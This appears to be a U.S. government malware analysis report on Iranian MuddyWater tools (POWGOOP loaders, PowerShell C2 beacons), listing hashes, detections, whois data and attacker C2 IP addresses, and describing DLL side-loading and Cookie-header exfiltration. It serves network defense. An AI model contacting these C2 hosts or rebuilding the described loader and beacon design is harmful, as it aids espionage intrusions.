Analysis Report

MAR–10369127–1.v1 – MuddyWater

Last Revised
Alert Code
AR22-055A

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), the United Kingdom’s National Cyber Security Centre (NCSC-UK), and the National Security Agency (NSA) to provide detailed analysis of 23 files identified as MuddyWater tools. MuddyWater is a group of Iranian government-sponsored advanced persistent threat actors that conducts cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America.



FBI, CISA, CNMF, NCSC-UK, and NSA are distributing this MAR to enable network defense and reduce exposure to Iranian government malicious cyber activity. For more information on malicious Iranian government cyber activity, visit CISA's webpage at https://www.cisa.gov/uscert/iran.



Of the 23 malware samples analyzed, 14 files were identified as variants of the POWGOOP malware family. Two files were identified as JavaScript files that contain a PowerShell beacon. One file was identified as a Mori backdoor sample. Two malicious Microsoft Excel spreadsheets were identified as Canopy malware (also known as Starwhale) that contained macros and two encoded Windows script files, which maintain persistence and collect and exfiltrate the victim's system data to a command and control (C2).



The POWGOOP samples were discovered as Windows executables (not included this report) and contain three components:



1)    A dynamic-link library (DLL) file renamed as a legitimate filename to enable the DLL side-loading technique.

2)    An obfuscated PowerShell script, obfuscated as a .dat file used to decrypt a file named "config.txt."

3)    An encoded PowerShell script, obfuscated as a text file containing a beacon to a hardcoded Internet Protocol (IP) address.



These components retrieve encrypted commands from a C2 server. The command is decrypted on the victim machine and piped into a PowerShell command, sending the results of the command in the Cookie parameter of the return traffic, using the same encryption/Base64 encoding routine.

 

For a downloadable copy of IOCs, see: MAR-10369127-1.v1.stix.

Click here for a PDF version of this report.

Submitted Files (19)

026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141 (Cooperation terms.xls)

12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa (goopdate.dll)

2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82 (goopdate.dat)

255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a (TeresitaJordain_config.txt)

3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8 (FML.dll)

42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986 (rj.js)

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c (ZaibCb15Ak.xls)

5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f (Config2.txt)

7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4 (Dore.dat)

9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7 (Config.txt)

9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051 (libpcre2-8-0.dll)

9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2 (AntheHannah_config.txt)

b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c (note.js)

b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504 (Core.dat)

b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a (config.txt)

ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9 (config.txt)

dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92 (vcruntime140.dll)

e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13 (Core.dat)

e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca (HeidieLeone.txt)

Additional Files (4)

c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e (Outlook.wsf)

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0 (Outlook.wsf)

ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418 (Outlook.wsf)

f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0 (Outlook.wsf)

IPs (7)

185.117.75.34

185.118.164.21

185.183.96.44

185.183.96.7

192.210.191.188

5.199.133.149

88.119.170.124

Findings

12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa

Tags

trojan

Details
Name goopdate.dll
Size 90624 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 a27655d14b0aabec8db70ae08a623317
SHA1 8344f2c1096687ed83c2bbad0e6e549a71b0c0b1
SHA256 12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
SHA512 3c9fa512e7360fecc4db3196e850db8b398d1950a21a3a1f529bbc0a1323cc3b4c8d1bf95acb9ceaa794cf135a56c0e761976f17326594ce08c89117b1700514
ssdeep 1536:Ggw+CKmmOmwE1k4XGt2EkxtNh7aZgvADsW/cd+32UVGHgz:RCBTDE1krt2Ebg5+32UQHgz
Entropy 6.359392
Antivirus
ESET a variant of Win32/Agent.ACHN trojan
Symantec Trojan Horse
Trend Micro Trojan.928E7209
Trend Micro HouseCall Trojan.928E7209
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-09-23 02:02:48-04:00
Import Hash 132491700659f9b56970a9b12cbbb348
PE Sections
MD5 Name Raw Size Entropy
dbe1463d7d1b0850df5e47b5320ef5fb header 1024 2.757475
c732c8e6ad0cf8292aa60a9da9dcbe7c .text 54784 6.609888
3bd80fc1bbd1476e125d2e487662e01f .rdata 27648 5.042288
ccd03992b1a52aba460a01a4113d59c8 .data 2560 2.366593
c7a4e8ec050a078d37fff5197af953e2 .rsrc 512 4.712298
2de65738f49b99cdb71355bdc924c55a .reloc 4096 6.411331
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Relationships
12db8bcee0... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
Description

This file was identified as a launcher and is contained within an executable "GoogleUpdate.exe" (not included in this submission). The DLL is renamed as a legitimate filename "goopdate.dll" to enable a DLL side-loading technique. Note: goopdate.dll is the name of a module belonging to Goopdate from Google Inc. The DLL side-loading technique is used to rename a malicious DLL to the name of a dependent file of a legitimate executable in order to execute its malicious code. For this variant, GoogleUpdate.exe depends on a legitimate file ‘goopdate.dll’. The malicious POWGOOP DLL is therefore renamed goopdate.dll to force GoogleUpdate.exe to execute the malicious code, which spawns a Rundll32.exe process to launch goopdate.dll with the DllRegisterServer function (Figure 1). This results in a PowerShell script, a "goopdate.dat" file (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82) decrypting a co-located "config.txt" file (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9), another obfuscated PowerShell script containing the C2 beacon.

Screenshots

Figure 1 - Screenshot of GoogleUpdate.exe spawning a Rundll32.exe process to launch goopdate.dll with the DllRegisterServer function.

Figure 2 - Screenshot of the PowerShell script being decrypted.

2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82

Details
Name goopdate.dat
Size 115546 bytes
Type data
MD5 218d4151b39e4ece13d3bf5ff4d1121b
SHA1 28e799d9769bb7e936d1768d498a0d2c7a0d53fb
SHA256 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
SHA512 8f859945f0c3e590db99bb35f4127f34910268c44f94407e98a5399fec44d92523d07230e793209639914afe61d17dfb41273193e30bbfb950b29ffce3d4b9d5
ssdeep 3072:bI+Rz2t2VGAQIP2DR7mOOfKI12sKDrS51ODTKjI2:bpF2t2VV2DNmOOyI8s441FjI
Entropy 7.971267
Antivirus
Bitdefender Generic.Exploit.Donut.2.5DE6F72C
Emsisoft Generic.Exploit.Donut.2.5DE6F72C (B)
Lavasoft Generic.Exploit.Donut.2.5DE6F72C
Sophos ATK/DonutLdr-A
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
2471a039cb... Related_To ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
2471a039cb... Related_To 12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
Description

This file was identified as an obfuscated PowerShell script and is contained within an executable "GoogleUpdate.exe" (not included in this submission). This obfuscated PowerShell script is used to decode and run the additional obfuscated PowerShell script "config.txt" (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

Screenshots

Figure 3 - Screenshot of the de-obfuscated PowerShell script.

ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9

Details
Name config.txt
Size 3364 bytes
Type data
MD5 52299ffc8373f58b62543ec754732e55
SHA1 ca97ac295b2cd57501517c0efd67b6f8a7d1fbdf
SHA256 ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
SHA512 6c9dc3ae0d3090bab57285ac1bc86d0fa60096221c99a383cc1a5a7da1c0614dfdbe4e6fa2aea9ff1e8d3415495d2d444c2f15ad9a1fd3847ddb0fc721f101a2
ssdeep 48:oN/rGOTDwOQ0rSt4tD9f+1o09KP/iyrjfODVosSh9lwrjhChwsFKDUGymwx:qroOlfBPz5sSh+w9v
Entropy 5.346853
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
ce9bd1acf3... Related_To 2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
ce9bd1acf3... Connected_To 185.183.96.7
Description

This file was identified as an encrypted PowerShell script and is contained within an executable "GoogleUpdate.exe" (not included in this submission). This PowerShell script is decoded by "goopdate.dat" (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82) and contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]183[.]96[.]7:443/index.php

--End C2 IP address--



The malware used the hardcoded C2 to pass remote commands to the victim machine. The encrypted commands are decrypted on the victim machine and piped into a PowerShell command, sending the results of the command in the Cookie parameter of the return traffic, using the same encryption/Base64 encoding routine.



The script uses 1-3 randomly generated human names as variables and function names (Figure 4). The script uses a modified Base64 routine adding or subtracting by 2, using two consecutive functions (Base64Dec, QueenieSusanneAvril) to decrypt remote commands to execute locally and two consecutive functions (Marlie, Kassandra) to encrypt the result and pass to the “Cookie:” parameter to be passed back to the C2 node.



The config.txt can be run separately as a .ps1 PowerShell script to execute the de-obfuscated code, which results in the victim machine pulling down any command the threat actor places in the index.php file located at 185[.]183[.]96[.]7:443 (ie. 'whoami') and executes locally on the victim machine. The script exfiltrates the result of the command in a Base64 encoded string passed through the 'Cookie: <Base64_encoded_string>' part of the packet (Figure 6).

Screenshots

Figure 4 - Screenshot of the script.

Figure 5 - Screenshot of the GET request sent over port 443 for "index.php" from the IP address 185[.]183[.]96[.]7.

Figure 6 - Screenshot of the GET request.

185.183.96.7

Tags

command-and-control

URLs
  • 185.183.96.7/index.php
Ports
  • 443 TCP
Whois

Queried whois.ripe.net with "-B 185.183.96.7"...



% Information related to '185.183.96.0 - 185.183.96.255'



% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'



inetnum:        185.183.96.0 - 185.183.96.255

netname:        EU-HOSTSAILOR

descr:         HostSailor NL Services

country:        NL

admin-c:        AA31720-RIPE

tech-c:         AA31720-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-12-23T09:52:06Z

last-modified: 2016-12-23T09:52:06Z

source:         RIPE



person:         Ali Al-Attiyah

address:        Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +971 455 77 845

nic-hdl:        AA31720-RIPE

mnt-by:         MNT-HS

created:        2016-12-21T19:19:26Z

last-modified: 2019-03-18T14:07:12Z

source:         RIPE



% Information related to '185.183.96.0/24AS60117'



route:         185.183.96.0/24

descr:         EU-HOSTSAILOR 185.183.96.0/24

origin:         AS60117

mnt-by:         MNT-HS

created:        2016-12-23T09:50:04Z

last-modified: 2016-12-23T09:50:04Z

source:         RIPE

Relationships
185.183.96.7 Connected_From ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
Description

config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9) attempts to connect to this IP address.

9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051

Tags

trojan

Details
Name libpcre2-8-0.dll
Size 96768 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 860f5c2345e8f5c268c9746337ade8b7
SHA1 6c55d3acdc2d8d331f0d13024f736bc28ef5a7e1
SHA256 9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051
SHA512 15b758ada75ae3a6848e3e528e07b19e0efb4156105f0e2ff4486c6df35574c63ccaae5e00d3c4f1ac3f5032f3eb5732179d187979779af4658e8e4dc5020f9f
ssdeep 1536:TjdtPuB/MpXu7QeqqPKaSc9/Sc+Amru3xobZFsWo/dcd+0Q+MoOl5:TfuBwXuUeqqPIkSc4u3xobb+0Q+MRl5
Entropy 6.397339
Antivirus
ESET a variant of Win32/Agent.ADJB trojan
VirusBlokAda BScope.Trojan.Agentb
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-10-05 03:59:42-04:00
Import Hash 412395ba322a0d1b557db71f338aadde
PE Sections
MD5 Name Raw Size Entropy
b474b7d68214633e93dc1ab3fcad9a4b header 1024 2.769462
d9e1cff126e23d40d396bebc0fe103be .text 55296 6.612472
8528c24241b97c45d2f90f3ef1baceec .rdata 33280 5.178997
96565e257370e82ea6cc20bdc7831a7b .data 2560 2.380258
43041985e356ec1bb76514dd6d7a347f .rsrc 512 4.717679
6b5a16c382d161788b9cc48d74f91543 .reloc 4096 6.435504
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Description

This file was identified as a launcher and is renamed as a legitimate filename "libpcre2-8-0.dll" to enable a DLL side-loading technique. Note: libpcre2-8-0.dll is a library for Mingw-w64, an open source software development environment. This file has similar capabilities as "goopdate.dll" (12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa).

dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92

Tags

trojan

Details
Name vcruntime140.dll
Size 93696 bytes
Type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 cec48bcdedebc962ce45b63e201c0624
SHA1 81f46998c92427032378e5dead48bdfc9128b225
SHA256 dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92
SHA512 661a59b4cdb4aab652b24cb9b7ca54cdee1d50ac3b0479cb418cf8ec2f7bda15fcc2622e6b08a784187ec3f43acd678d1d73efacd43ac33501963d5e4dfe32e9
ssdeep 1536:jjevM3civEZfW15lbrWKIAy4pcd8uHxQEbZFsWo/dcdV0yjHe9c0b5i2MUql5:jzcbfO5lbr6Ay4huHxHbbV0eHe9c0b5I
Entropy 6.386276
Antivirus
AhnLab Trojan/Win.Generic
Avira TR/Agent.fizgi
Bitdefender Trojan.GenericKD.37827502
ESET a variant of Win32/Agent.ADJB trojan
Emsisoft Trojan.GenericKD.37827502 (B)
IKARUS Trojan.Win32.Agent
K7 Trojan ( 005893651 )
Lavasoft Trojan.GenericKD.37827502
McAfee RDN/Generic.dx
Symantec Trojan.Gen.MBT
VirusBlokAda BScope.Trojan.Agentb
Zillya! Trojan.Agent.Win32.2507968
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-10-11 08:50:42-04:00
Import Hash 99474d9cfb6d6c2c0eada954b5521471
PE Sections
MD5 Name Raw Size Entropy
644538127a7d5372f16bbc62790e1b5d header 1024 2.778786
46d87fd65afee2330ee32fe404fe7657 .text 55808 6.623812
7bc20c2666aeb10cbe1787cdeeb38138 .rdata 29696 5.111049
8adf7f42b993b6d8b658ea5a9d554a49 .data 2560 2.380664
065463fcb19d087772450d47229f013f .rsrc 512 4.717679
1a870fa886d593f0dd1c9ce8816c3a63 .reloc 4096 6.466938
Packers/Compilers/Cryptors
Borland Delphi 3.0 (???)
Description

This file was identified as a launcher and is renamed as a legitimate filename "vcruntime140.dll" to enable a DLL side-loading technique. Note: vcruntime140.dll is a runtime library for Microsoft Visual Studio. This file has similar capabilities as "goopdate.dll" (12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa).

b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504

Details
Name Core.dat
Size 222554 bytes
Type data
MD5 a65696d6b65f7159c9ffcd4119f60195
SHA1 570f7272412ff8257ed6868d90727a459e3b179e
SHA256 b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504
SHA512 65661ca585e10699eaded4f722914c79b5922e93ea4ca8ecae4a8e3f1320e7b806996f7a54dffbe9d1cdeda593f08e8d95cd831d57de9d9568ea6d8bd280988b
ssdeep 6144:AD5ss4qHWpWYY3X3YxMNkpMj7vl+AQOjI:Uss4QEWYwYxM+CdZ3
Entropy 7.990578
Antivirus
Bitdefender Generic.Exploit.Donut.2.50F4F7F0
Emsisoft Generic.Exploit.Donut.2.50F4F7F0 (B)
Lavasoft Generic.Exploit.Donut.2.50F4F7F0
Sophos ATK/DonutLdr-A
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13

Details
Name Core.dat
Size 222554 bytes
Type data
MD5 4a022ea1fd2bf5e8c0d8b2343a230070
SHA1 89df0feca9a447465d41ac87cb45a6f3c02c574d
SHA256 e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13
SHA512 bec85adf79b916ee64c4a4b6f2cf60d8321d7394a2ec299c3547160f552ecae403c6a2a9aa669cf789d4d99b01c637ac1d0da3c9ed8872bb6184b5ad9543d580
ssdeep 6144:HzUl+nQWOJ0h0Q+MhozbM8RTVwS9HTkSaRIJjI:HzNQkC06bZuSBTky
Entropy 7.990584
Antivirus
Bitdefender Generic.Exploit.Donut.2.B85DA16C
Emsisoft Generic.Exploit.Donut.2.B85DA16C (B)
Lavasoft Generic.Exploit.Donut.2.B85DA16C
Sophos ATK/DonutLdr-A
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4

Tags

trojan

Details
Name Dore.dat
Size 208222 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 6c084c8f5a61c6bec5eb5573a2d51ffb
SHA1 61608ed1de56d0e4fe6af07ecba0bd0a69d825b8
SHA256 7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4
SHA512 4eaa2d6f29d2712f3487ff7e3a463ec4ba711ba36edda422db126840282e8705ebee6304cc9a54433c7fac7759f98a9543eda881726d8b788f4487b8d4f42423
ssdeep 6144:LiJOsC/WBmefvpzeChVsg3euJHs7pdcAOlnI:LLWBmyvp/s5uJHs7pdcvI
Entropy 6.489815
Antivirus
Avira HEUR/AGEN.1144435
Bitdefender Generic.Exploit.Shellcode.PE.1.A192654B
ESET PowerShell/Runner.AA trojan
Emsisoft Generic.Exploit.Shellcode.PE.1.A192654B (B)
IKARUS Trojan.PowerShell.Runner
K7 Riskware ( 0040eff71 )
Lavasoft Generic.Exploit.Shellcode.PE.1.A192654B
Sophos Mal/Swrort-Y
Symantec Trojan Horse
VirusBlokAda BScope.Trojan.Wacatac
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2020-10-11 08:50:37-04:00
Import Hash ec0fa343230fe2524df352e5e73f52a2
PE Sections
MD5 Name Raw Size Entropy
57e428c7f6e8430e0380e9a1681a940c header 1024 2.806123
89eb652b81f7b3cd7e9ee9e718575c09 .text 135168 6.614331
4f6c6295c85743cc3a2ca8f5dc2c4648 .rdata 58368 5.330927
3fe517cfbe9700ed9c311661377fcbd9 .data 4096 3.056628
7d123d6987b6fa0f191e9ee2fb0d9484 .rsrc 512 4.711341
320df1e8ed4184af06bb4c62a00cc47b .reloc 8704 6.441951
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Description

This file was identified as an obfuscated PowerShell script and is used to decode and run an additional obfuscated PowerShell script. This file is similar to goopdate.dat (2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82).

b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a

Details
Name config.txt
Size 3615 bytes
Type data
MD5 b6b0edf0b31bc95a042e13f3768a65c3
SHA1 5168a8880abe8eb2d28f10787820185fe318859e
SHA256 b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
SHA512 669e655ca79c95d8d25e56cb0c4c71574ff74f55e11930e9cdbfb4a3767fce0d09ab362d2f188a153ba25497b8a2508d0501bca342c0558f06e921f603b2218c
ssdeep 48:oOd/U/82KlaUdrSS1A82RBBboWuP7qgGgmzfBUXX7PXTWPJJ5wx:YmP71+Ju
Entropy 5.291145
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
b6133e04a0... Connected_To 185.117.75.34
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

185[.]117[.]75[.]34

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

185.117.75.34

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.ripe.net with "-B 185.117.75.34"...



% Information related to '185.117.75.0 - 185.117.75.255'



% Abuse contact for '185.117.75.0 - 185.117.75.255' is 'abuse@hostsailor.com'



inetnum:        185.117.75.0 - 185.117.75.255

netname:        EU-HOSTSAILOR-20140124

descr:         HostSailor NL Services

country:        NL

admin-c:        AF11712-RIPE

tech-c:         AF11712-RIPE

status:         ASSIGNED PA

mnt-by:         MNT-HS

created:        2016-02-01T08:50:02Z

last-modified: 2016-02-01T08:50:02Z

source:         RIPE



person:         Host Sailor Ltd - Administrative role account

address:        Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area

address:        Dubai P.O. Box 98362

address:        United Arab Emirates

phone:         +97145577845

nic-hdl:        AF11712-RIPE

mnt-by:         MNT-HS

created:        2014-06-30T16:22:26Z

last-modified: 2019-05-29T09:39:31Z

source:         RIPE

Relationships
185.117.75.34 Connected_From e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
185.117.75.34 Connected_From b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
Description

config.txt (b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a) and HeidieLeone.txt (e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca) attempt to connect to this IP address.

9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7

Tags

trojan

Details
Name Config.txt
Size 5037 bytes
Type ASCII text, with very long lines, with no line terminators
MD5 a0421312705e847a1c8073001fd8499c
SHA1 3204447f54adeffb339ed3e00649ae428544eca3
SHA256 9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7
SHA512 32c89ce4ec39c0f05fdd578ac7dbd51a882fdca632a00a591655992f258fe1b870c5ac6732d79c835578fd85c237d69d10886b1bec087217b921b8dbd2d7ab50
ssdeep 96:ND25Bb2G+6C3z+FPyY1PgWuRuSpqq8HRYwC+w7ivocD6ZpY59lmBZ1q0c3:NKnCGO3iFPysIW8YlHRYw5w6F6ZpYUB0
Entropy 5.941005
Antivirus
ESET PowerShell/Agent.FP trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

192[.]210[.]191[.]188

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

192.210.191.188

Tags

command-and-control

Ports
  • 443 TCP
Whois

Queried whois.arin.net with "n ! NET-192-210-191-0-1"...



NetRange:     192.210.191.0 - 192.210.191.255

CIDR:         192.210.191.0/24

NetName:        CC-192-210-191-0-24

NetHandle:     NET-192-210-191-0-1

Parent:         CC-11 (NET-192-210-128-0-1)

NetType:        Reallocated

OriginAS:     AS36352

Organization: Virtual Machine Solutions LLC (VMSL-100)

RegDate:        2019-03-26

Updated:        2019-03-26

Ref:            https://rdap.arin.net/registry/ip/192.210.191.0





OrgName:        Virtual Machine Solutions LLC

OrgId:         VMSL-100

Address:        12201 Tukwila International Blvd

City:         Seattle

StateProv:     WA

PostalCode:     98168

Country:        US

RegDate:        2016-06-22

Updated:        2020-12-10

Comment:        http://virmach.com/abuse to report abuse.

Ref:            https://rdap.arin.net/registry/entity/VMSL-100





OrgTechHandle: GOLES88-ARIN

OrgTechName: Golestani, Amir

OrgTechPhone: +1-800-877-2176

OrgTechEmail: report@virmach.com

OrgTechRef:    https://rdap.arin.net/registry/entity/GOLES88-ARIN



OrgAbuseHandle: GOLES88-ARIN

OrgAbuseName: Golestani, Amir

OrgAbusePhone: +1-800-877-2176

OrgAbuseEmail: report@virmach.com

OrgAbuseRef:    https://rdap.arin.net/registry/entity/GOLES88-ARIN

Relationships
192.210.191.188 Connected_From 5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
Description

Config.txt (9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7) and Config2.txt (5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f) attempt to connect to this IP address.

5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f

Tags

trojan

Details
Name Config2.txt
Size 5037 bytes
Type ASCII text, with very long lines, with no line terminators
MD5 a16f4f0c00ca43d5b20f7bc30a3f3559
SHA1 94e26fb2738e49bb70b445315c0d63a5d364c71b
SHA256 5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
SHA512 e1f929029e7382e0a900fb3523dbc175d503b1903b034d88aed3e50aed768ce79c52091520e4a3e40c04e00ab70af3d438de35c79502ff8b11adcb45f6f666bd
ssdeep 96:ND25Bb2FNushsy1XSWSAIm0Rs1yjLzJ8f3zT+ujYa42g2QR4HElM+ejX+2jIQSgp:NKnCFvsLcIm0bfzAd4F6HEl92pSgoFu
Entropy 5.935676
Antivirus
ESET PowerShell/Agent.FP trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
5bcdd42208... Connected_To 192.210.191.188
Description

This file was identified as an encrypted PowerShell script; it contains a beacon to the following hardcoded IP address:



--Begin C2 IP address--

192[.]210[.]191[.]188

--End C2 IP address--



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2

Details
Name AntheHannah_config.txt
Size 3491 bytes
Type data
MD5 51bc53a388fce06487743eadc64c4356
SHA1 b9e6fc51fa3940fb632a68907b8513634d76e5a0
SHA256 9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2
SHA512 43d291535b7521a061a24dc0fb1c573d1d011f7afa28e8037dea69eb5ae5bcd69b53a01a636e91827831066f9afc84efc1d556f64dc5cd780f9da79d38783b70
ssdeep 48:oJX/VlShMEtkDJrSYChZh60cIpoEzMPkQwpCUOfcUeHe0eGeBr8ONIPoUy3pIhwx:uStoJCXhbcIvgPkQw8rfcR+xjBrRUsT
Entropy 5.319055
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file was identified as an encrypted PowerShell script; it contains a beacon.



This file has similar capabilities as config.txt (ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9).

255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a

Details
Name TeresitaJordain_config.txt
Size 3580 bytes
Type data
MD5 0ac499496fb48de0727bbef858dadbee
SHA1 483cd5c9dd887367793261730d59178c19fe13f3
SHA256 255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
SHA512 be0d181aabd07b122fcdb79a42ba43ed879a5f0528745447f2c93c6d9cb75c00f1d581520c640fd7f4a61a6f27ef82d99ad09ee2f1cc85340252a7eb7a9fa7a1
ssdeep 48:oHyk/BbLGAQUJaqQNMWyT1veKRzKykrSaowAQncpQNiqyC2V+mqoS3NwPK+2/t+Q:dyF1p7cKRzDbRBCUDP9X5NbfZJRQURC7
Entropy 5.296734
Antivirus

No matches found.

YARA Rules

